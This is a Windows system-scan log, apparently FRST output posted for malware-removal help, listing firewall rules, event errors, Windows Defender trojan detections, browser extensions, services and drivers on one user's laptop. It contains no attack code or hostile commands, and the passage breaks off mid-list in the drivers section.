(Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [TCP Query User{27AB2084-96CC-423D-8AE7-D0AC93666081}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [UDP Query User{3AF93F33-8A51-4215-BC5E-F4DB7A8EEE52}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{50B50355-5350-4725-BD33-5A7C6482C01A}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{E18A37C3-3221-4F6B-9241-67BE79FCF0DC}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{07B5D44D-4E10-43B2-9078-1C393459622F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe No File FirewallRules: [{667D3D91-E5EA-4EA3-9A3C-5C2F77E71A0D}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe No File FirewallRules: [{0CF852DE-F4B5-441D-95F8-130531A3076F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe No File FirewallRules: [{0513F420-E8DE-4C74-BAF0-F3CFF66CE5C6}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe No File FirewallRules: [{6DDFF7C5-16FF-49FF-95F9-472442614287}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google Inc.) FirewallRules: [{255BD4B5-55AB-4A04-AF01-2ECA95F1F335}] => (Allow) C:\Program Files\Opera\58.0.3135.65\opera.exe (Opera Software AS -> Opera Software) FirewallRules: [TCP Query User{DD2AF73D-267B-418A-A0F5-05DD5ED97831}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [UDP Query User{A7B50CA7-7E26-4E38-BC39-4332936FB3E2}C:\users\stanley\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent\utorrent.exe (BitTorrent Inc -> BitTorrent Inc.) ==================== Restore Points ========================= 30-01-2019 08:42:13 Scheduled Checkpoint 07-02-2019 07:32:46 Scheduled Checkpoint 14-02-2019 03:01:16 Removed IncrediMail. 14-02-2019 23:59:09 Restore Point Created by FRST 16-02-2019 07:50:46 JRT Pre-Junkware Removal ==================== Faulty Device Manager Devices ============= Name: Description: Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. ==================== Event log errors: ========================= Application errors: ================== Error: (02/18/2019 01:22:23 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: License Activation (slui.exe) failed with the following error code: hr=0x8007007B Command-line arguments: RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable Error: (02/17/2019 01:43:05 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 7875 Error: (02/17/2019 01:43:05 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledEvent 7875 Error: (02/17/2019 01:43:05 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: Continuously busy for more than a second Error: (02/17/2019 01:43:05 PM) (Source: RIM MDNS) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 7875 Error: (02/17/2019 01:43:05 PM) (Source: RIM MDNS) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledEvent 7875 Error: (02/17/2019 01:43:05 PM) (Source: RIM MDNS) (EventID: 100) (User: ) Description: Task Scheduling Error: Continuously busy for more than a second Error: (02/17/2019 01:43:01 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Task Scheduling Error: m->NextScheduledSPRetry 3953 System errors: ============= Error: (02/17/2019 01:14:02 PM) (Source: Tcpip) (EventID: 4199) (User: ) Description: The system detected an address conflict for IP address 0.0.0.0 with the system having network hardware address 00-00-00-00-00-00. Network operations on this system may be disrupted as a result. Error: (02/16/2019 09:01:30 AM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The Iskysoft Application Framework Service service hung on starting. Error: (02/16/2019 09:00:39 AM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: The OpenVPN Legacy Service service terminated with the following error: The process cannot access the file because it is being used by another process. Error: (02/16/2019 09:00:37 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The UC Browser Service service failed to start due to the following error: The system cannot find the file specified. Error: (02/16/2019 08:33:34 AM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The Iskysoft Application Framework Service service hung on starting. Error: (02/16/2019 08:32:43 AM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: The OpenVPN Legacy Service service terminated with the following error: The process cannot access the file because it is being used by another process. Error: (02/16/2019 08:32:42 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The UC Browser Service service failed to start due to the following error: The system cannot find the file specified. Error: (02/16/2019 07:38:07 AM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The Iskysoft Application Framework Service service hung on starting. Windows Defender: =================================== Date: 2019-02-15 01:30:44.644 Description: Windows Defender scan has been stopped before completion. Scan ID: {33A0CEFD-234D-475F-8ADE-5D3D11D9E85A} Scan Type: Antimalware Scan Parameters: Full Scan Date: 2019-02-14 03:37:29.427 Description: Windows Defender scan has been stopped before completion. Scan ID: {37ABE826-5D4C-4627-8D24-955304B7A07C} Scan Type: Antimalware Scan Parameters: Quick Scan Date: 2019-02-13 23:30:12.489 Description: Windows Defender has detected malware or other potentially unwanted software. For more information please see the following: http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fuerboos.C!cl&threatid=2147723654&enterprise=0 Name: Trojan:Win32/Fuerboos.C!cl ID: 2147723654 Severity: Severe Category: Trojan Path: file:_C:\Users\Stanley\AppData\Local\Dingbam.tst Detection Origin: Local machine Detection Type: FastPath Detection Source: User Process Name: Unknown Signature Version: AV: 1.285.1510.0, AS: 1.285.1510.0, NIS: 0.0.0.0 Engine Version: AM: 1.1.15600.4, NIS: 0.0.0.0 Date: 2019-02-13 23:30:12.489 Description: Windows Defender has detected malware or other potentially unwanted software. For more information please see the following: http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Bitrep.A&threatid=2147723097&enterprise=0 Name: Trojan:Win32/Bitrep.A ID: 2147723097 Severity: Severe Category: Trojan Path: file:_C:\Users\Stanley\AppData\Local\IM\Identities\{A156883C-4811-474F-ACCE-796599B8B822}\Message Store\Messages\4\{E94F6B5A-2129-4595-A27B-FBAABD7D5EE2}\Attachments\Order_009.pdf Detection Origin: Local machine Detection Type: FastPath Detection Source: User Process Name: Unknown Signature Version: AV: 1.285.1510.0, AS: 1.285.1510.0, NIS: 0.0.0.0 Engine Version: AM: 1.1.15600.4, NIS: 0.0.0.0 Date: 2019-02-13 23:30:12.489 Description: Windows Defender has detected malware or other potentially unwanted software. For more information please see the following: http://go.microsoft.com/fwlink/?linkid=37020&name=SoftwareBundler:Win32/Prepscram&threatid=226289&enterprise=0 Name: SoftwareBundler:Win32/Prepscram ID: 226289 Severity: High Category: Software Bundler Path: containerfile:_C:\Users\Stanley\Downloads\Programs\BG-HUNTING SERBIA.txt;file:_C:\Users\Stanley\Downloads\Programs\BG-HUNTING SERBIA.txt->setup.exe Detection Origin: Local machine Detection Type: Concrete Detection Source: User Process Name: Unknown Signature Version: AV: 1.285.1510.0, AS: 1.285.1510.0, NIS: 0.0.0.0 Engine Version: AM: 1.1.15600.4, NIS: 0.0.0.0 Date: 2019-02-13 16:10:19.791 Description: Windows Defender has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.269.584.0 Update Source: Microsoft Update Server Signature Type: AntiVirus Update Type: Full Current Engine Version: Previous Engine Version: 1.1.14901.4 Error code: 0x80070424 Error description: The specified service does not exist as an installed service. Date: 2019-02-13 16:02:00.333 Description: Windows Defender has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.269.584.0 Update Source: Microsoft Malware Protection Center Signature Type: AntiSpyware Update Type: Full Current Engine Version: Previous Engine Version: 1.1.14901.4 Error code: 0x80072ee2 Error description: The operation timed out Date: 2019-02-13 16:02:00.333 Description: Windows Defender has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.269.584.0 Update Source: Microsoft Malware Protection Center Signature Type: AntiVirus Update Type: Full Current Engine Version: Previous Engine Version: 1.1.14901.4 Error code: 0x80072ee2 Error description: The operation timed out Date: 2019-02-13 15:59:52.285 Description: Windows Defender has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.269.584.0 Update Source: Microsoft Update Server Signature Type: AntiVirus Update Type: Full Current Engine Version: Previous Engine Version: 1.1.14901.4 Error code: 0x80070424 Error description: The specified service does not exist as an installed service. Date: 2018-05-29 09:02:21.940 Description: Windows Defender has encountered a critical error when taking action on malware or other potentially unwanted software. For more information please see the following: http://go.microsoft.com/fwlink/?linkid=37020&name=PWS:Win32/Dyzap.X&threatid=2147717189&enterprise=0 Name: PWS:Win32/Dyzap.X ID: 2147717189 Severity: Severe Category: Password Stealer Path: process:_pid:5952,ProcessStart:131720254146746317 Detection Origin: Unknown Detection Type: Concrete Detection Source: System Process Name: C:\Users\Stanley\AppData\Local\Temp\~AceTemp\APPROVED_DOCUMENTS_2018_PDF\APPROVED DOCUMENTS 2018_PDF.exe Action: Quarantine Action Status: To finish removing malware and other potentially unwanted software, you need to run a full scan. For information about scanning options, see Help and Support. To finish removing malware and other potentially unwanted software, restart the computer. Error Code: 0x8007054f Error description: An internal error occurred. Signature Version: AV: 1.267.1085.0, AS: 1.267.1085.0, NIS: 0.0.0.0 Engine Version: AM: 1.1.14800.3, NIS: 0.0.0.0 CodeIntegrity: =================================== Date: 2018-12-23 07:19:51.102 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2018-12-23 07:19:49.365 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2018-12-23 07:19:47.582 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2018-12-23 07:19:45.686 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Memory info =========================== Processor: Intel(R) Core(TM) i5-2540M CPU @ 2.60GHz Percentage of memory in use: 71% Total physical RAM: 4006.35 MB Available physical RAM: 1129.15 MB Total Virtual: 7974.35 MB Available Virtual: 4140.02 MB ==================== Drives ================================ Drive 😄 () (Fixed) (Total:297.75 GB) (Free:65.53 GB) NTFS \\?\Volume{4756afb4-4eee-11e8-824f-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.34 GB) (Free:0.09 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7/8/10) (Size: 298.1 GB) (Disk ID: 2DDE751F) Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=297.7 GB) - (Type=07 NTFS) ==================== End of Addition.txt ============================
  5. NEW FRST.TXT FireFox: ======== FF ProfilePath: C:\Users\Stanley\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default [2019-02-15] FF Extension: (Google Code Correction) - C:\Users\Stanley\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\features\{5b8c6255-56bd-4974-a055-17773a870acc}\google-code-correction@mozilla.org.xpi [2018-05-21] [Legacy] FF HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc7 FF Extension: (IDM integration) - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc7 [2018-09-23] [Legacy] [not signed] FF HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc5 FF Extension: (IDM CC) - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc5 [2019-02-16] [Legacy] [not signed] FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_286.dll [2016-01-19] () FF Plugin: @videolan.org/vlc,version=3.0.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN) FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN) FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_286.dll [2016-01-19] () FF Plugin-x32: @RIM.com/WebSLLauncher,version=1.0 -> C:\Program Files (x86)\Common Files\Research In Motion\BBWebSLLauncher\NPWebSLLauncher.dll [2015-05-22] () FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-17] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-17] (Google Inc.) Chrome: ======= CHR DefaultProfile: Profile 3 CHR Session Restore: Profile 3 -> is enabled. CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default [2019-02-15] CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08] CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2018-06-15] CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2018-11-08] CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-12] CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-11-08] CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default [2019-02-17] CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-15] CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-15] CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-02-15] CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-15] CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-15] CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-02-16] CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-02-15] CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-02-15] CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-15] CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-02-17] CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-05-04] CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-05-04] CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-23] CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-05-04] CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-05-04] CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-26] CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-10] CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-16] CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-05-04] CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-05-04] CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-16] CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2 [2019-02-17] CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-07] CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-07] CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-27] CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-07] CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-07] CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-25] CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-16] CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-16] CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-07] CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-07] CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-16] CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3 [2019-02-18] CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-07] CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-07] CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-06-07] CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-07] CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-07] CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-06] CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-10] CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-16] CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-07] CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-07] CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-16] CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\System Profile [2019-02-15] CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08] CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2015-07-10] CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2015-07-10] ==================== Services (Whitelisted) ==================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 AgereModemAudio; C:\Program Files\LSI SoftModem\agr64svc.exe [42096 2015-08-05] (Avago Technologies U.S. Inc. -> LSI Corporation) R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [85304 2018-10-16] (Apple Inc. -> Apple Inc.) S3 aspnet_state; C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe [32768 2004-07-15] (Microsoft Corporation) [File not signed] R3 BlackBerry Device Manager; C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\BbDevMgr.exe [588024 2014-10-31] (BlackBerry Ltd. -> BlackBerry Limited) S3 CommuniGate Pro Messaging Server; C:\Windows\CommuniGatePro\CGStarter.exe [38552 2017-02-14] (CommuniGate Systems -> ) R2 hpHotkeyMonitor; C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\hpHotkeyMonitor.exe [684624 2015-06-23] (Hewlett-Packard -> Hewlett-Packard Company) S3 hpqcaslwmiex; C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [1031704 2016-06-03] (Hewlett-Packard Company -> HP) R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [347512 2018-12-06] (HP Inc. -> HP Inc.) R2 HPWMISVC; C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [606224 2016-04-19] (Hewlett-Packard Company -> HP Inc.) R2 IsAppService; C:\Program Files (x86)\Iskysoft\IAF\2.4.2.223\IsAppService.exe [473352 2017-03-30] (Shenzhen Yi Xing Investment Co., Ltd. -> Iskysoft) R3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6562472 2019-02-01] (Malwarebytes Corporation -> Malwarebytes) R2 OpenVPNService; C:\Program Files\OpenVPN\bin\openvpnserv2.exe [24192 2018-03-06] (OpenVPN Technologies, Inc. -> ) R2 OpenVPNServiceInteractive; C:\Program Files\OpenVPN\bin\openvpnserv.exe [75392 2018-04-26] (OpenVPN Technologies, Inc. -> The OpenVPN Project) S2 OpenVPNServiceLegacy; C:\Program Files\OpenVPN\bin\openvpnserv.exe [75392 2018-04-26] (OpenVPN Technologies, Inc. -> The OpenVPN Project) R2 RIM MDNS; C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\mDNSResponder.exe [396024 2015-05-26] (BlackBerry Ltd. -> Apple Inc.) R2 RIM Tunnel Service; C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\tunmgr.exe [1355000 2015-05-26] (BlackBerry Ltd. -> BlackBerry Limited) R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246872 2017-11-17] (Synaptics Incorporated -> Synaptics Incorporated) S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [6889232 2015-12-14] (TeamViewer -> TeamViewer GmbH) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation -> Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation -> Microsoft Corporation) ===================== Drivers (Whitelisted) ====================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R3 Accelerometer; C:\Windows\system32\DRIVERS\Accelerometer.sys [43840 2012-09-24] (Hewlett-Packard Company -> Hewlett-Packard Company) R3 AgereSoftModem; C:\Windows\system32\DRIVERS\agrsm64.sys [1230104 2015-08-05] (Microsoft Windows Hardware Compatibility Publisher -> LSI Corporation) S3 androidusb; C:\Windows\System32\Drivers\wsadb.sys [38008 2017-11-10] (Anvsoft Inc. -> Google Inc) S3 blackberryncm; C:\Windows\system32\DRIVERS\blackberryncm6_AMD64.sys [25600 2015-01-23] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited) R3 btwavdt; C:\Windows\system32\DRIVERS\btwavdt.sys [230656 2015-03-13] (Broadcom Corporation -> Broadcom Corporation.) S3 BTWUSB; C:\Windows\System32\Drivers\btwusb.sys [66136 2015-11-25] (Broadcom Corporation -> Broadcom Corporation.) S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) R3 e1cexpress; C:\Windows\system32\DRIVERS\e1c64x64.sys [468752 2014-07-29] (Intel Corporation -> Intel Corporation) R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [153328 2019-01-08] (Malwarebytes Corporation -> Malwarebytes) R0 hpdskflt; C:\Windows\System32\DRIVERS\hpdskflt.sys [31040 2012-09-24] (Hewlett-Packard Company -> Hewlett-Packard Company) S3 hwdatacard; C:\Windows\system32\DRIVERS\ewusbmdm.sys [116864 2009-06-03] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.) R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [127136 2019-02-16] (Malwarebytes Corporation -> Malwarebytes) R3 MBAMProtection; C:\Windows\system32\DRIVERS\mbam.sys [72864 2019-02-16] (Malwarebytes Corporation -> Malwarebytes) R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [274416 2019-02-16] (Malwarebytes Corporation -> Malwarebytes) R3 MBAMWebProtection; C:\Windows\system32\DRIVERS\mwac.sys [114040 2019-02-16] (Malwarebytes Corporation -> Malwarebytes) S3 Netaapl; C:\Windows\system32\DRIVERS\netaapl64.sys [23040 2018-04-18] (Microsoft Windows Hardware Compatibility Publisher -> Apple Inc.) R3 NETwNe64; C:\Windows\system32\DRIVERS\NETwew00.sys [3349984 2014-03-08] (Intel Corporation-Mobile Wireless Group -> Intel Corporation) S3 